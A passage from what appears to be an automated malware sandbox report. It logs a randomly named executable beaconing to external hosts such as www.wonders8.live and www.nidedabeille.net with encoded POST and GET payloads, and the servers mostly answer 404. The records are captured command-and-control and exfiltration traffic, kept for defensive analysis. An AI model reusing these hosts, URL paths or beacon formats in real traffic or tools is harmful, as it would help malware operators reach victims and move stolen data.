                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.wonders8.live
                                                                                                              Origin: http://www.wonders8.live
                                                                                                              Referer: http://www.wonders8.live/44hl/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 35 6b 34 4b 64 72 2b 43 5a 63 37 4e 4d 63 6c 4d 39 43 31 42 73 49 41 74 4b 53 36 45 50 4a 70 44 30 6b 76 39 72 78 6c 61 6f 69 79 34 30 58 33 68 52 32 36 78 34 39 50 50 36 6a 4a 2f 72 52 5a 70 30 4d 4e 6c 39 64 68 76 64 48 4e 47 6e 41 5a 76 74 39 34 38 37 65 79 72 46 6d 6d 73 33 72 53 57 38 66 61 62 61 41 62 30 32 73 64 4f 56 44 63 45 71 57 30 64 68 52 63 32 6f 6e 4a 5a 6b 2f 68 44 53 6b 53 6a 53 36 37 6b 32 33 42 35 33 5a 52 31 62 48 63 7a 69 79 39 49 53 48 43 48 66 6d 4d 47 51 62 68 73 33 63 50 52 50 49 66 37 51 44 64 48 6a 34 45 4b 6d 35 33 33 43 34 73 48 52 67 6b 34 41 32 45 30 66 73 73 34 39 51 49 4a 50 49 66 76 2f 37 76 6f 42 72 77 51 43 37 55 6e 71 57 59 59 4b 39 2f 55 7a 78 73 30 4b 70 30 76 39 36 39 33 73 48 59 64 72 68 41 7a 4d 6f 47 2f 74 44 4a 77 79 77 34 53 53 75 70 6f 63 6c 73 37 72 45 64 66 44 6e 4e 4e 74 64 5a 76 39 42 6d 35 37 35 48 50 68 56 44 34 73 72 2f 6e 54 56 62 36 75 56 43 70 55 77 33 45 67 49 50 41 46 4e 6b 44 42 38 4b 59 53 66 44 73 79 51 55 36 76 48 78 74 75 [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=5k4Kdr+CZc7NMclM9C1BsIAtKS6EPJpD0kv9rxlaoiy40X3hR26x49PP6jJ/rRZp0MNl9dhvdHNGnAZvt9487eyrFmms3rSW8fabaAb02sdOVDcEqW0dhRc2onJZk/hDSkSjS67k23B53ZR1bHcziy9ISHCHfmMGQbhs3cPRPIf7QDdHj4EKm533C4sHRgk4A2E0fss49QIJPIfv/7voBrwQC7UnqWYYK9/Uzxs0Kp0v9693sHYdrhAzMoG/tDJwyw4SSupocls7rEdfDnNNtdZv9Bm575HPhVD4sr/nTVb6uVCpUw3EgIPAFNkDB8KYSfDsyQU6vHxtuj02wQFBsHsHw41+KQyqtJDmkoLJHoytF+prb16vAqZGP6GeOYaXsoTPICiukS71EspXIwq7wbk61tjDJwietHJ/yS5wMylCKQb8QzPgvmKOWtfvOlGRTAgN8oVihlYv0i+j/iwycPunAikd736reL5CfBv46nBoE1uVf6kVJEY34a111gTt4w+NKgNzB6M11fgLF/292J7vND9mtKJoCpRnj+vJp3ZaqSZIAYCndFrVluWEHSFm2946aDO+nIXcvIkUPg/ewAxTqlPPit4QJqlb0OwCctt4G+60C8SVOEiEGrWQdaUY5Zk3fE+2eKK0Ej1cF8sk06cHQLGhl6at/hXi0c6yVNARmAAWkhtKXtWn2EyoPzAnhzcn/ULE4RFVwEacE/YT6dAw5JNW//vs8W1M/zDza9Ns9d2uWFPHX6
                                                                                                              Nov 5, 2024 15:34:56.308661938 CET1289OUTData Raw: 43 41 6f 52 5a 72 34 56 49 77 50 7a 51 7a 59 72 64 67 43 42 72 33 6e 48 4f 43 6d 69 6d 55 56 53 35 67 4a 34 6f 6e 4a 49 73 6f 5a 45 67 41 53 59 62 66 69 6c 53 30 30 41 78 56 4a 32 34 6a 48 74 42 64 4f 53 38 6c 6e 49 35 43 6c 57 47 72 2b 61 6b 63
                                                                                                              Data Ascii: CAoRZr4VIwPzQzYrdgCBr3nHOCmimUVS5gJ4onJIsoZEgASYbfilS00AxVJ24jHtBdOS8lnI5ClWGr+akczWtV14ruwwfD+weMzPkIDqPyblDKidVXIyAM0VKs06b71VCLXWZ8DxvmMGB/w60ZZeBmcME9Blx4G8NkycAGzCl2flyDsJeOvSVMqK7KpjXiF4b15hy1qzlrww+x6Gx2gpbQfd9rJZkcB/QBK7CizP3ul1P6NIC1N
                                                                                                              Nov 5, 2024 15:34:56.308712006 CET5317OUTData Raw: 55 6b 4e 59 6a 4e 33 42 52 6f 72 6d 6c 47 45 4f 41 30 34 71 41 2f 67 4d 6b 75 34 63 70 65 33 5a 76 35 47 4e 64 54 4d 57 32 37 67 6a 39 64 4d 38 45 46 2b 59 2b 61 57 5a 42 34 62 36 53 32 7a 44 6e 45 55 79 47 61 6f 7a 77 48 76 47 47 78 4f 43 62 53
                                                                                                              Data Ascii: UkNYjN3BRormlGEOA04qA/gMku4cpe3Zv5GNdTMW27gj9dM8EF+Y+aWZB4b6S2zDnEUyGaozwHvGGxOCbSd4EYknGHRKJgJ1ZOIJ/YuVed8D3OzKoL3n4X8xr4OVQ0GbGLQMwVP0ZC+TY9uuz5EEuv8WXqqnTjFpRtVhJgP1+YgeQn7fBAcPyiTdshHrefWJpSh86b3sBXG+smwgaLnwDaS6V2Mf9B9wN2J1Mb/aQFGra5/ljd5
                                                                                                              Nov 5, 2024 15:34:56.766845942 CET643INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:34:56 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 358
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 [TRUNCATED]
                                                                                                              Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              16192.168.11.2049757119.18.54.27804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:59.268990040 CET457OUTGET /44hl/?Q2_4=0mQqee+UGJnUA/Yx1BcY9bAABUibbqUVx0XTpT1xrmayiD/fNEmP8Z3r8TZ3vglxtN5riIpUZVEdwgctiqwj4JSuSDuD97XK84LsZQ3P19o3XG1/uWMy0C8=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.wonders8.live
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:34:59.775443077 CET844INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:34:59 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 583
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a [TRUNCATED]
                                                                                                              Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              17192.168.11.2049758195.110.124.133804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:35:13.574532032 CET735OUTPOST /oy0l/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.nidedabeille.net
                                                                                                              Origin: http://www.nidedabeille.net
                                                                                                              Referer: http://www.nidedabeille.net/oy0l/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 69 65 2b 51 36 7a 6c 46 42 68 75 66 49 44 64 4c 68 4f 49 32 78 6e 64 4c 30 5a 36 35 34 6c 4d 55 38 59 34 48 54 38 35 61 66 6a 33 61 66 4d 53 35 34 52 6e 47 68 52 66 68 54 6f 48 39 6f 74 6c 4c 75 56 7a 6e 58 43 49 38 30 71 53 79 44 70 6b 44 30 6f 44 51 4d 30 2f 31 50 74 45 2b 51 56 75 30 70 44 4f 33 33 4e 66 36 6e 30 69 49 71 47 43 54 4e 4f 46 74 41 59 39 72 45 45 79 4a 79 64 41 77 36 56 78 6c 59 31 72 57 62 32 41 50 4a 53 4f 76 36 37 59 4c 42 6f 32 54 63 50 65 53 59 77 33 48 6c 4c 68 36 6b 2f 4b 61 68 39 4c 5a 71 41 52 66 33 46 4e 4a 46 46 43 75 49 56 6e 66 4a 37 4e 77 4b 41 3d 3d
                                                                                                              Data Ascii: Q2_4=ie+Q6zlFBhufIDdLhOI2xndL0Z654lMU8Y4HT85afj3afMS54RnGhRfhToH9otlLuVznXCI80qSyDpkD0oDQM0/1PtE+QVu0pDO33Nf6n0iIqGCTNOFtAY9rEEyJydAw6VxlY1rWb2APJSOv67YLBo2TcPeSYw3HlLh6k/Kah9LZqARf3FNJFFCuIVnfJ7NwKA==
                                                                                                              Nov 5, 2024 15:35:13.774205923 CET367INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:13 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 79 30 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              18192.168.11.2049759195.110.124.133804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:35:16.304152012 CET755OUTPOST /oy0l/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.nidedabeille.net
                                                                                                              Origin: http://www.nidedabeille.net
                                                                                                              Referer: http://www.nidedabeille.net/oy0l/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 69 65 2b 51 36 7a 6c 46 42 68 75 66 49 6a 4e 4c 73 4e 67 32 34 6e 64 4b 34 35 36 35 33 46 4d 49 38 59 30 48 54 39 38 58 66 51 54 61 63 75 4b 35 37 54 50 47 6d 52 66 68 59 49 48 43 6e 4e 6c 36 75 56 76 56 58 47 49 38 30 71 57 79 44 6f 34 44 31 65 4c 54 4e 6b 2f 7a 45 4e 45 38 65 31 75 30 70 44 4f 33 33 4a 33 41 6e 30 71 49 74 32 79 54 4f 73 74 73 63 6f 39 71 44 45 79 4a 35 39 42 35 36 56 77 47 59 30 47 7a 62 30 49 50 4a 51 57 76 35 71 59 49 62 34 33 59 54 76 66 75 58 51 79 41 6b 50 56 35 76 75 69 59 35 75 54 38 76 57 41 46 71 33 35 74 47 57 65 63 4d 6c 65 33 4c 35 4d 72 58 43 33 51 6c 55 55 6c 63 4a 5a 4b 37 79 47 7a 66 6c 52 62 68 47 34 3d
                                                                                                              Data Ascii: Q2_4=ie+Q6zlFBhufIjNLsNg24ndK45653FMI8Y0HT98XfQTacuK57TPGmRfhYIHCnNl6uVvVXGI80qWyDo4D1eLTNk/zENE8e1u0pDO33J3An0qIt2yTOstsco9qDEyJ59B56VwGY0Gzb0IPJQWv5qYIb43YTvfuXQyAkPV5vuiY5uT8vWAFq35tGWecMle3L5MrXC3QlUUlcJZK7yGzflRbhG4=
                                                                                                              Nov 5, 2024 15:35:16.504554033 CET367INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:16 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 79 30 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              19192.168.11.2049760195.110.124.133804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:35:19.042628050 CET2578OUTPOST /oy0l/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.nidedabeille.net
                                                                                                              Origin: http://www.nidedabeille.net
                                                                                                              Referer: http://www.nidedabeille.net/oy0l/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 69 65 2b 51 36 7a 6c 46 42 68 75 66 49 6a 4e 4c 73 4e 67 32 34 6e 64 4b 34 35 36 35 33 46 4d 49 38 59 30 48 54 39 38 58 66 51 62 61 66 64 43 35 34 79 50 47 6e 52 66 68 45 34 48 44 6e 4e 6c 64 75 56 6d 65 58 47 4d 47 30 6f 65 79 42 4b 63 44 79 73 6a 54 44 6b 2f 7a 4c 74 45 39 51 56 75 62 70 48 71 37 33 4e 54 41 6e 30 71 49 74 77 65 54 5a 75 46 73 50 34 39 72 45 45 79 4e 79 64 41 63 36 56 34 34 59 30 79 4e 62 46 6f 50 48 51 47 76 2f 59 67 49 44 6f 33 61 57 76 66 32 58 52 4f 50 6b 4f 38 4b 76 74 2b 79 35 6f 33 38 6a 68 74 67 34 58 4e 7a 54 33 79 33 45 55 32 32 42 34 73 49 64 31 72 2f 68 6d 45 62 63 4f 42 7a 31 44 4f 36 43 41 46 75 2f 78 46 4f 4b 4b 55 31 76 68 36 4e 6e 79 39 75 53 46 66 64 33 46 4a 39 39 34 59 4d 32 41 51 32 35 78 4a 64 52 4a 4b 59 72 32 34 6d 47 65 62 66 74 56 4a 4a 4c 35 41 6b 65 48 34 61 52 33 4e 46 50 46 2f 35 78 57 6e 67 44 49 2b 31 50 41 39 59 64 77 37 47 79 67 66 75 52 77 54 49 54 34 6a 32 6e 6f 55 70 72 35 70 6b 79 7a 55 44 37 69 42 74 4a 37 74 43 33 67 34 57 6c [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=ie+Q6zlFBhufIjNLsNg24ndK45653FMI8Y0HT98XfQbafdC54yPGnRfhE4HDnNlduVmeXGMG0oeyBKcDysjTDk/zLtE9QVubpHq73NTAn0qItweTZuFsP49rEEyNydAc6V44Y0yNbFoPHQGv/YgIDo3aWvf2XROPkO8Kvt+y5o38jhtg4XNzT3y3EU22B4sId1r/hmEbcOBz1DO6CAFu/xFOKKU1vh6Nny9uSFfd3FJ994YM2AQ25xJdRJKYr24mGebftVJJL5AkeH4aR3NFPF/5xWngDI+1PA9Ydw7GygfuRwTIT4j2noUpr5pkyzUD7iBtJ7tC3g4WlTbMH99aCOyvM6tGfBiuqGt4g/aMDYVOTLL4CZxvcGj/ci8UgYqm1sbP1m4hhkD00y7AKAhqWmBRYzAkKy+WHo480SfDCr1gRXLU0+RT6PEXPgebTe1IxDfjC6jFecx6q7QXRVQOvFNvDMjUR8q2Kxyl0eDfSqVcMlq+SNAMpib/J80w+bkxtwHCeeNaK5Xhwq/olhFfazsIkdg6YgY5/XM8FmMrsbxcCOMuwZkuSVZ4hZ6W5xKrR0FtJLRql/AzqhQ36gtnd81DpOoeHii+wRQv3Pan3WARFWXnEgDiYzozSfmAlzITW+PlkC5RWRNbS48gvF2EZCAz9s0BKHVzUUc6UvNinFdI/iEJHUBoc66YvqNfaav9naC7HKkm42s3Xsd55hC/O1ESEy6DGKv/2/Q9/+nL3+IfAoVvyHOWS519pyq3X2oNR0NzH9+r9eDkM9Xaerfvd7zKd2VIW8VE9ORTJk6IY4GQeotvEZxjkWA0bsmvNUwTzNhu48rANPb73k9yxrb4rezI7Oe1qDxcBgCqVRCKfyG53tvNoerjL/j4tTKZFOssHItrPi+PoDZlbgSD2tnTbqv7fROgW0CSCxwCjDyREiCIHNpuPtyP6GcD+g/kQWPxHcORg+rAVUmej5AGb3HI0gbyEuZsvZLPENO3yrHDKD279xO [TRUNCATED]
                                                                                                              Nov 5, 2024 15:35:19.042659998 CET5326OUTData Raw: 4e 64 34 6e 59 71 6a 45 47 75 7a 6c 66 50 4c 63 5a 47 6c 31 6d 6b 2b 6b 79 44 7a 79 33 2b 6b 52 59 4a 35 56 46 46 43 35 38 62 71 4c 4e 37 49 4d 4c 75 73 7a 43 6b 50 71 6e 43 2b 4b 70 54 42 57 6b 4e 67 33 4f 77 74 35 6d 45 58 48 36 51 56 6d 43 71
                                                                                                              Data Ascii: Nd4nYqjEGuzlfPLcZGl1mk+kyDzy3+kRYJ5VFFC58bqLN7IMLuszCkPqnC+KpTBWkNg3Owt5mEXH6QVmCq6wr6mAaMpg0Lz3xgzMoNbKNEy3mY94c7mvi1/0Rlja/vCs9CBpHuzmgVJbvgHAVPdnNqK9hsI8gPrbyOwkMETWEOzBwvn9hPQnakI2XVKY0EIcwYCseuOxHDfPAGm/NHPbpwYEip1xTZZ/gD9SdQMHrdNtORQY286
                                                                                                              Nov 5, 2024 15:35:19.245040894 CET367INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:19 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 79 30 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              20192.168.11.2049761195.110.124.133804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:35:21.771250010 CET460OUTGET /oy0l/?uXP=1HX8&Q2_4=vcWw5DdjdQnkJmRMu9Bv0nYhxIjg8XNP87kLKcEwcjL/VJXYlRnLhwXYdIbeiM5Wp1LHJGQmwLmzd8N63pnOImbiL9MWYGLhlQi4+Y3hzWOb/gf9Ze4XcY0= HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.nidedabeille.net
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:35:21.972999096 CET367INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:21 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 79 30 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              21192.168.11.2049762203.161.41.204804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:35:27.296200037 CET723OUTPOST /3qrm/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
